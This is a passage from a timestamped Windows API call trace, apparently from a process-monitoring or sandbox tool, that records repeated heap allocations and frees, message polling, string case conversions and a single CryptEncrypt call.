(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0201.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0201.174] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0201.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0201.175] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.176] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0201.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0201.177] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0201.179] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.180] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.180] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.180] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.180] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.181] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0201.181] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0201.185] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1788*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1788*, pdwDataLen=0x8bef68*=0x8) returned 1 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.185] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0201.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.185] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0201.185] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0201.186] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 